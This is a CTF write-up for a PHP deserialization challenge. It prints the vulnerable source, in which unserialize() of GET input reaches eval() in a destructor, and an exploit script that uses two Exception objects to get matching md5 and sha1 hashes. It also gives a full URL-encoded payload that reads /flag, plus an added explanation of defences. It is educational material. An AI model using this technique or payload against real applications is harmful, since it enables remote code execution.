CDUT Information Security Association Challenge: Deserialization 02
A challenge that looks impossible on its face usually means there is a loophole to exploit.
### Straight to the source code

```php
<?php
show_source(__FILE__);

class CDUTSEC
{
    public $var1;
    public $var2;

    function __construct($var1, $var2)
    {
        // Assigns to the local parameters, not to $this->var1 / $this->var2.
        // Irrelevant for the challenge: unserialize() never calls a constructor.
        $var1 = $var1;
        $var2 = $var2;
    }

    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        // Loose inequality on the raw values, strict equality on both hashes.
        if (($this->var1 != $this->var2)
            && (md5($this->var1) === md5($this->var2))
            && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}

unserialize($_GET['payload']);
```
### Code audit

At first glance: the two variables must differ under loose comparison, yet their md5 and sha1 hashes must be strictly equal. The array trick comes to mind first, but eval() needs a string, and an array cast to a string is just "Array", so arrays are out. On top of that, MD5 and SHA1 are checked together here, so a fastcoll collision is no use either. So what now?
No insiders here, so let's bring out the expert's blog post:
Using the Exception class to bypass md5, sha1 and the like: https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/
### The script written from that blog post:

```php
<?php
// The challenge's constructor and destructor are left out of the local copy of the
// class (they were commented out in the original script): unserialize() never calls
// a constructor, and the real __destruct() would otherwise run here when this script exits.
class CDUTSEC
{
    public $var1;
    public $var2;
}

$cmd = "readfile('/flag');?>";
// Same message, different code, both created on ONE line so that file and line match:
// Exception::__toString() includes message, file and line but not the code, so the two
// objects differ under != while their string forms, and hence md5/sha1, are identical.
$a = new Exception($cmd); $b = new Exception($cmd, 1);
$tr = new CDUTSEC();
$tr->var1 = $a;
$tr->var2 = $b;
echo urlencode(serialize($tr));
```
The reason for urlencode() here is that the raw serialized string contains bytes (the null bytes around protected property names such as `\0*\0message`) that show up as garbage in a text editor; URL-encoding guarantees the payload we copy is neither lost nor corrupted.
Also, this challenge bans several of the functions usually used to grab the flag. The command we send is changed at `$cmd`; it is advisable to first send `'phpinfo();?>'`, partly because success or failure is then easy to tell, and partly to see whether the common functions are banned.
Finally we read the flag with readfile().
payload:

```text
O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D
```
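To make the mechanism behind the code-audit section and the script above concrete, here is an added example (my own code, not part of the original writeup or the challenge). It shows why a pair of Exception objects satisfies the md5/sha1 check, why the two `new Exception` calls have to sit on the same line, where the null bytes that force the urlencode() step come from, and two ways a defender closes the hole: a type check before hashing, and `allowed_classes => false` so that unserialize() cannot instantiate gadget classes at all. The message `'demo'` and the function name `values_collide()` are my own choices.

```php
<?php
// Added example, not the writeup's code. Run with any PHP 7.4+ / 8.x CLI.

// Same message, different code, both constructed on ONE line. Exception::__toString()
// includes message, file and line but not the code, so the string forms are identical.
$a = new Exception('demo'); $b = new Exception('demo', 1);

var_dump($a != $b);                 // bool(true): loose object comparison sees a different $code
var_dump(md5($a) === md5($b));      // bool(true): md5() hashes the __toString() output
var_dump(sha1($a) === sha1($b));    // bool(true)
echo (string) $a, "\n";             // "Exception: demo in /path/file.php:6 Stack trace: #0 {main}"
// That string is what eval() receives in the challenge, which is why the writeup's $cmd
// ends in "?>": it stops the parser before the file path and stack trace that follow.

// Caveat: constructed on different lines, the line numbers differ and the hashes no longer match.
$c = new Exception('demo');
$d = new Exception('demo', 1);
var_dump(md5($c) === md5($d));      // bool(false)

// Protected properties serialize as "\0*\0name"; these null bytes are why the payload is urlencoded.
var_dump(strpos(serialize($a), "\0*\0message") !== false);   // bool(true)

// Defence 1: refuse anything that is not a plain string before hashing. Objects with
// __toString() never reach md5()/sha1(), so the Exception pair is rejected outright.
function values_collide($v1, $v2): bool
{
    if (!is_string($v1) || !is_string($v2)) {
        return false;
    }
    return $v1 !== $v2
        && hash_equals(md5($v1), md5($v2))
        && hash_equals(sha1($v1), sha1($v2));
}
var_dump(values_collide($a, $b));   // bool(false)

// Defence 2: never unserialize untrusted input; if unavoidable, forbid object creation.
// The Exception arrives as __PHP_Incomplete_Class: no __toString(), no __destruct(), no gadget.
$obj = unserialize(serialize($a), ['allowed_classes' => false]);
var_dump(get_class($obj));          // string(22) "__PHP_Incomplete_Class"
```

The type check alone is enough to defeat this particular trick, but it does not make `unserialize($_GET['payload'])` safe: any other class with a usable `__destruct()` or `__wakeup()` remains reachable, which is why the `allowed_classes` restriction (or a format such as JSON that cannot express objects) is the fix a reviewer should ask for.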
Nothing much to say; just a small bit of knowledge picked up while grinding challenges. (laughs)